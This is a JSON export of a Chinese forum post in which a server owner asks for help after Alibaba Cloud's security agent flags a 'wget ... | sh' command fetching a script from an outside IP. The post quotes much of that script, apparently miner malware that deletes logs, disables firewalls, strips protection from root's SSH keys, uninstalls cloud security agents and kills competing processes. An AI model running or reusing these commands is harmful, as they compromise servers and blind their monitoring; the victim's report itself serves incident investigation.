{"id":121078,"date":"2020-06-20T16:30:11","date_gmt":"2020-06-20T08:30:11","guid":{"rendered":"http:\/\/4563.org\/?p=121078"},"modified":"2020-06-20T16:30:11","modified_gmt":"2020-06-20T08:30:11","slug":"%e5%ae%89%e8%a3%85%e9%98%bf%e9%87%8c%e4%ba%91%e7%9b%be-%e6%80%bb%e6%98%af%e6%8a%a5%e6%81%b6%e6%84%8f%e8%84%9a%e6%9c%ac%e6%89%a7%e8%a1%8c","status":"publish","type":"post","link":"http:\/\/4563.org\/?p=121078","title":{"rendered":"\u5b89\u88c5\u963f\u91cc\u4e91\u76fe \u603b\u662f\u62a5\u6076\u610f\u811a\u672c\u6267\u884c"},"content":{"rendered":"\n<p>  \t\t\t\t\t<strong>cnsdwu<\/strong>  \t\t\t\t\u5927\u4f6c\u6709\u8bdd\u8bf4 : \t<\/p>\n<h3>\u5b89\u88c5\u963f\u91cc\u4e91\u76fe \u603b\u662f\u62a5\u6076\u610f\u811a\u672c\u6267\u884c<\/h3>\n<p>  \t\t\u4e4b\u524d\u670d\u52a1\u5668\u88ab\u6302\u4e86\u6316\u77ff\u8f6f\u4ef6 \u91cd\u88c5\u4e86\u4e0b\u7cfb\u7edf<br \/>  \u5b89\u88c5\u4e86\u963f\u91cc\u4e91\u7684agent,<br \/>  \u7136\u540e\u88c5\u4e86amh\u540e\u4e00\u76f4\u62a5 \u6267\u884c\u4e00\u4e2a\u811a\u672c<br \/>  \u90e8\u5206\u62a5\u544a\u4fe1\u606f\u5982\u4e0b<\/p>\n<p>  \u8be5\u544a\u8b66\u7531\u5982\u4e0b\u5f15\u64ce\u68c0\u6d4b\u53d1\u73b0\uff1a<br \/>  \u547d\u4ee4\u884c\uff1ash -c wget -q -O - 93.189.43.3\/t.sh|sh<br \/>  \u8fdb\u7a0bPID\uff1a7187<br \/>  \u8fdb\u7a0b\u6587\u4ef6\u540d\uff1abash<br \/>  \u7236\u8fdb\u7a0bID\uff1a7186<br \/>  \u7236\u8fdb\u7a0b\u6587\u4ef6\u8def\u5f84\uff1a\/usr\/local\/php-7.4\/sbin\/php-fpm<br \/>  \u4e8b\u4ef6\u8bf4\u660e\uff1a\u4e91\u5b89\u5168\u4e2d\u5fc3\u68c0\u6d4b\u5230\u60a8\u7684\u4e3b\u673a\u6b63\u5728\u6267\u884c\u6076\u610f\u7684\u811a\u672c\u4ee3\u7801(\u5305\u62ec\u4f46\u4e0d\u9650\u4e8ebash\u3001powershell\u3001python)\uff0c\u8bf7\u7acb\u523b\u6392\u67e5\u5165\u4fb5\u6765\u6e90\u3002\u5982\u679c\u662f\u60a8\u7684\u8fd0\u7ef4\u884c\u4e3a\uff0c\u8bf7\u9009\u62e9\u5ffd\u7565\u3002<\/p>\n<p>  
\u90fd\u662f\u6307\u5411\u4e00\u4e2a\u811a\u672c\u7684\uff0c\u9ebb\u70e6\u5927\u5bb6\u7ed9\u770b\u4e00\u4e0b\u8fd9\u4e2a\u811a\u672c\u662f\u5e72\u5565 \u662f\u654c\u662f\u53cb<br \/>  \u811a\u672c\u90e8\u5206\u5982\u4e0b<br \/>  #!\/bin\/sh<br \/>  ulimit -n 65535<br \/>  rm -rf \/var\/log\/syslog<br \/>  chattr -iua \/tmp\/<br \/>  chattr -iua \/var\/tmp\/<br \/>  ufw disable<br \/>  iptables -F<br \/>  echo &quot;nope&quot; &gt;\/tmp\/log_rot<br \/>  sudo sysctl kernel.nmi_watchdog=0<br \/>  echo &#8216;0&#8217; &gt;\/proc\/sys\/kernel\/nmi_watchdog<br \/>  echo &#8216;kernel.nmi_watchdog=0&#8217; &gt;&gt;\/etc\/sysctl.conf<br \/>  userdel akay<br \/>  userdel vfinder<br \/>  chattr -iae \/root\/.ssh\/<br \/>  chattr -iae \/root\/.ssh\/authorized_keys<br \/>  rm -rf \/tmp\/addres*<br \/>  rm -rf \/tmp\/walle*<br \/>  rm -rf \/tmp\/keys<br \/>  if ps aux | grep -i &#8216;liyun&#8217;; then<br \/>  curl http:\/\/update.aegis.aliyun.com\/download\/uninstall.sh | bash<br \/>  curl http:\/\/update.aegis.aliyun.com\/download\/quartz_uninstall.sh | bash<br \/>  pkill aliyun-service<br \/>  rm -rf \/etc\/init.d\/agentwatch \/usr\/sbin\/aliyun-service<br \/>  rm -rf \/usr\/local\/aegis*<br \/>  systemctl stop aliyun.service<br \/>  systemctl disable aliyun.service<br \/>  service bcm-agent stop<br \/>  yum remove bcm-agent -y<br \/>  apt-get remove bcm-agent -y<br \/>  elif ps aux | grep -i &#8216;unjing&#8217;; then<br \/>  \/usr\/local\/qcloud\/stargate\/admin\/uninstall.sh<br \/>  \/usr\/local\/qcloud\/YunJing\/uninst.sh<br \/>  \/usr\/local\/qcloud\/monitor\/barad\/admin\/uninstall.sh<br \/>  fi<br \/>  netstat -anp | grep 185.71.65.238 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | xargs -I % kill -9 %<br \/>  netstat -anp | grep 140.82.52.87 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :443 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; 
&#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :23 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :443 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :143 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :2222 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :3333 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :3389 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :4444 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :5555 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :6666 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :6665 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :6667 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :7777 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :8444 | 
awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :3347 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :14444 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :14433 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :13531 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %\t\t\t\t<\/p>\n<p>  \t\t\t\t\t<strong>\u6e05\u98ce\u9080\u660e\u6708<\/strong>  \t\t\t\t\u5927\u4f6c\u6709\u8bdd\u8bf4 : \t<\/p>\n<h3><\/h3>\n<p>  \t\t15\u5206\u949f\u65e0\u56de\u7b54\uff0c\u5e2e\u4f60\u4e00\u628a\t\t\t  <\/p>\n","protected":false},"excerpt":{"rendered":"<p>cnsdwu \u5927\u4f6c\u6709\u8bdd\u8bf4 : 
\u5b89\u88c5&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[],"tags":[],"_links":{"self":[{"href":"http:\/\/4563.org\/index.php?rest_route=\/wp\/v2\/posts\/121078"}],"collection":[{"href":"http:\/\/4563.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/4563.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/4563.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/4563.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=121078"}],"version-history":[{"count":0,"href":"http:\/\/4563.org\/index.php?rest_route=\/wp\/v2\/posts\/121078\/revisions"}],"wp:attachment":[{"href":"http:\/\/4563.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=121078"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/4563.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=121078"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/4563.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=121078"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}